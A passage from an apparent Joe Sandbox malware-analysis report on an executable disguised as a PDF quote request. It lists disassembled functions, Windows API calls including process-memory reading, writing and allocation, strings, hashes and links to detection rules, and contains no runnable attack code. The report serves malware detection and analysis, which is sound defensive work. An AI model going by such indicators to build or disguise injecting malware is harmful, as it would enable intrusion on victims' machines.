                                                                                                                • __Init_thread_footer.LIBCMT ref: 00AC7BFB
                                                                                                                  • Part of subcall function 00A601F8: EnterCriticalSection.KERNEL32(00B1070C,?,?,00A58747,00B12514), ref: 00A60202
                                                                                                                  • Part of subcall function 00A601F8: LeaveCriticalSection.KERNEL32(00B1070C,?,00A58747,00B12514), ref: 00A60235
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                                • API String ID: 535116098-3733170431
                                                                                                                • Opcode ID: dd00b9bdb6226c66cc24de2fb300fe1885e46f57e57f57794465ad84892d42aa
                                                                                                                • Instruction ID: dadfe429c74db3696d9bc6b17f8a72aff21590f55c782ce77fb6228ca1c0be94
                                                                                                                • Opcode Fuzzy Hash: dd00b9bdb6226c66cc24de2fb300fe1885e46f57e57f57794465ad84892d42aa
                                                                                                                • Instruction Fuzzy Hash: 51916A74A04209EFCB15EF98D991EADB7B1BF48300F51809DF8069B292DB71AE81CF51
                                                                                                                Function 00AA2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AAB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AA21D0,?,?,00000034,00000800,?,00000034), ref: 00AAB42D
                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AA2760
                                                                                                                  • Part of subcall function 00AAB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AA21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00AAB3F8
                                                                                                                  • Part of subcall function 00AAB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00AAB355
                                                                                                                  • Part of subcall function 00AAB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AA2194,00000034,?,?,00001004,00000000,00000000), ref: 00AAB365
                                                                                                                  • Part of subcall function 00AAB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AA2194,00000034,?,?,00001004,00000000,00000000), ref: 00AAB37B
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AA27CD
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AA281A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                • Opcode ID: 0739b6190d01f2521bad195b0aa7e65013e3b0704257a7f52e76fac8b0577da3
                                                                                                                • Instruction ID: b3b380ef99f01add5f7b17db27282e229ad77c55255c0cb5540e449fc8cd7bea
                                                                                                                • Opcode Fuzzy Hash: 0739b6190d01f2521bad195b0aa7e65013e3b0704257a7f52e76fac8b0577da3
                                                                                                                • Instruction Fuzzy Hash: 18412C76900218AFDB10DFA8CD45BEEBBB8EF0A700F104099FA55B7181DB746E45CBA1
                                                                                                                Function 00A7172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe,00000104), ref: 00A71769
                                                                                                                • _free.LIBCMT ref: 00A71834
                                                                                                                • _free.LIBCMT ref: 00A7183E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$FileModuleName
                                                                                                                • String ID: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe
                                                                                                                • API String ID: 2506810119-1231057770
                                                                                                                • Opcode ID: b71f9462aed8a6e19eedbe6997c3d14f057c28557df3391de069773baad68855
                                                                                                                • Instruction ID: 1f9dbc83ee924bee8ae84e160a98eaef7b47cda0a62113b129b742c681af3d5a
                                                                                                                • Opcode Fuzzy Hash: b71f9462aed8a6e19eedbe6997c3d14f057c28557df3391de069773baad68855
                                                                                                                • Instruction Fuzzy Hash: 4F314D75A00218AFDB25DFAD9D85D9EBBFCEB85310B54C166F90897211DAB08A40CB91
                                                                                                                Function 00AAC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00AAC306
                                                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00AAC34C
                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B11990,01165760), ref: 00AAC395
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 135850232-4108050209
                                                                                                                • Opcode ID: 81ab69bf76b3d6d8644ecee55774ade23e9c5ae817a439516ebf2753c64f7648
                                                                                                                • Instruction ID: 97ec0c37ca403668b0f960d1696633cf9fcfda67a45e82e1152b9509407cd76e
                                                                                                                • Opcode Fuzzy Hash: 81ab69bf76b3d6d8644ecee55774ade23e9c5ae817a439516ebf2753c64f7648
                                                                                                                • Instruction Fuzzy Hash: E441A3752083019FEB24DF25D844B6AFBE8AF86330F14861DF9A59B2D1D770E904CB62
                                                                                                                Function 00AD4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00ADCC08,00000000,?,?,?,?), ref: 00AD44AA
                                                                                                                • GetWindowLongW.USER32 ref: 00AD44C7
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AD44D7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID: SysTreeView32
                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                • Opcode ID: 1eaec3c9be83e784df7c84680362fd14f3c81ecda8aee602ea3c3ec14c5c4962
                                                                                                                • Instruction ID: 3f7cace41ca20dbeb9062f784f3109df5ee3c227ac35b8f43a291eadd1080c4d
                                                                                                                • Opcode Fuzzy Hash: 1eaec3c9be83e784df7c84680362fd14f3c81ecda8aee602ea3c3ec14c5c4962
                                                                                                                • Instruction Fuzzy Hash: 0D319071210605AFDF208F78DC45BDA7BA9EB48334F204716F97A922D0D770EC919750
                                                                                                                Function 00AC304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AC335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00AC3077,?,?), ref: 00AC3378
                                                                                                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AC307A
                                                                                                                • _wcslen.LIBCMT ref: 00AC309B
                                                                                                                • htons.WSOCK32(00000000,?,?,00000000), ref: 00AC3106
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                • String ID: 255.255.255.255
                                                                                                                • API String ID: 946324512-2422070025
                                                                                                                • Opcode ID: ed40649a44a7e95f6ba2f99000ccb7149351b1b41ec859e0f923fb8054732fe6
                                                                                                                • Instruction ID: 61046a6572b66b5df1045a725707eef31b14e4f2e24cb45f066e49770164eb07
                                                                                                                • Opcode Fuzzy Hash: ed40649a44a7e95f6ba2f99000ccb7149351b1b41ec859e0f923fb8054732fe6
                                                                                                                • Instruction Fuzzy Hash: F531AE3B2002019FCF10CF68C585FAA77A0AF54318F2AC199E9168B392DB32EE41C761
                                                                                                                Function 00AD3EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AD3F40
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AD3F54
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AD3F78
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: SysMonthCal32
                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                • Opcode ID: 87d9c130ae94f926b0dd67d989e16cacc96b2d3faf973764f1bb933f5e70588b
                                                                                                                • Instruction ID: b45aa54956df3817ae2d0573fb606956ca083c731c4fe5a35c3ef2b612122be1
                                                                                                                • Opcode Fuzzy Hash: 87d9c130ae94f926b0dd67d989e16cacc96b2d3faf973764f1bb933f5e70588b
                                                                                                                • Instruction Fuzzy Hash: 4721AD33600219BFDF11CF90CC46FEA3B79EB48724F110215FA166B2D0DAB5A850CB90
                                                                                                                Function 00AD4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AD4705
                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AD4713
                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AD471A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                • String ID: msctls_updown32
                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                • Opcode ID: d5e4ba62a2c048cb71041114c2b5df4ba75d1f8c8a2ffe2180e9b3880735ae21
                                                                                                                • Instruction ID: 2554d5b3dc1ef71473edf8469810219201ae53cfb01317e70087768a7a12ee7e
                                                                                                                • Opcode Fuzzy Hash: d5e4ba62a2c048cb71041114c2b5df4ba75d1f8c8a2ffe2180e9b3880735ae21
                                                                                                                • Instruction Fuzzy Hash: 812162B5600205AFDB10DF68DCC1DB737ADEB5A3A4B44045AF6119B351DB31EC12CB60
                                                                                                                Function 00AA95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen
                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                • API String ID: 176396367-2734436370
                                                                                                                • Opcode ID: 3ba2a4ecd4a7b2c3e57e2ea5959bd2cec8dad8f5fca6991889bf0f7e2facda0a
                                                                                                                • Instruction ID: 7ef785db43eee052f2781a2b537c2499801d1721426550f2ac17b85ffef227fd
                                                                                                                • Opcode Fuzzy Hash: 3ba2a4ecd4a7b2c3e57e2ea5959bd2cec8dad8f5fca6991889bf0f7e2facda0a
                                                                                                                • Instruction Fuzzy Hash: 2F216A326042116AE331AB24DD03FBBB3ECAF96300F50442BF94A971C1EB65ED55C2D5
                                                                                                                Function 00AD37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AD3840
                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AD3850
                                                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AD3876
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                • String ID: Listbox
                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                • Opcode ID: a727def4f385fbe9d935517e383d9ee187bc32abafb1908aab704e1c29b06da4
                                                                                                                • Instruction ID: d6d78dfc001bc6f51dee950d55fee27e06167ca2e1395de6ae5c98866b632a7b
                                                                                                                • Opcode Fuzzy Hash: a727def4f385fbe9d935517e383d9ee187bc32abafb1908aab704e1c29b06da4
                                                                                                                • Instruction Fuzzy Hash: 0A21B072610119BBEF11CF54CC45FBB376EEF89760F108115F9029B290CA71DC5297A0
                                                                                                                Function 00AB49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00AB4A08
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AB4A5C
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,00ADCC08), ref: 00AB4AD0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                • String ID: %lu
                                                                                                                • API String ID: 2507767853-685833217
                                                                                                                • Opcode ID: 67d65e208d57d9a25bfd0e89655fd5afadad8a6e06fc96bb67800bf7cc281db6
                                                                                                                • Instruction ID: 9e5a1e7ae9e6fa079aa010ff44677101d06b9f359a4b30982323b29fc170293c
                                                                                                                • Opcode Fuzzy Hash: 67d65e208d57d9a25bfd0e89655fd5afadad8a6e06fc96bb67800bf7cc281db6
                                                                                                                • Instruction Fuzzy Hash: D3317C74A00209AFDB10DF54C985EAA7BF8EF48308F1480A9F909DB253D771EE46CB61
                                                                                                                Function 00AD41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AD424F
                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AD4264
                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AD4271
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: msctls_trackbar32
                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                • Opcode ID: 41cb0627aef25dec0b6bc84bdf84d27e49ca392f4055687fafa00c54c1b4bd79
                                                                                                                • Instruction ID: a1127ba16cf192f94ba621bb486e88fada4ccdddf53254aca565b7a3823e9150
                                                                                                                • Opcode Fuzzy Hash: 41cb0627aef25dec0b6bc84bdf84d27e49ca392f4055687fafa00c54c1b4bd79
                                                                                                                • Instruction Fuzzy Hash: 13110631240208BFEF205F68CC06FEB3BACEF99B64F114515FA56E21A0D671DC119B10
                                                                                                                Function 00AA2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                  • Part of subcall function 00AA2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AA2DC5
                                                                                                                  • Part of subcall function 00AA2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AA2DD6
                                                                                                                  • Part of subcall function 00AA2DA7: GetCurrentThreadId.KERNEL32 ref: 00AA2DDD
                                                                                                                  • Part of subcall function 00AA2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AA2DE4
                                                                                                                • GetFocus.USER32 ref: 00AA2F78
                                                                                                                  • Part of subcall function 00AA2DEE: GetParent.USER32(00000000), ref: 00AA2DF9
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00AA2FC3
                                                                                                                • EnumChildWindows.USER32(?,00AA303B), ref: 00AA2FEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                • String ID: %s%d
                                                                                                                • API String ID: 1272988791-1110647743
                                                                                                                • Opcode ID: 87c43b57b6a5dfa76f1bdd8e51198ffe0201376b3cd4868c457e097ab17e0251
                                                                                                                • Instruction ID: 97ab0ac797d4e7c6918dd01a0c5684ee250ce4b46d0a8823dbdb8fef2bbf622a
                                                                                                                • Opcode Fuzzy Hash: 87c43b57b6a5dfa76f1bdd8e51198ffe0201376b3cd4868c457e097ab17e0251
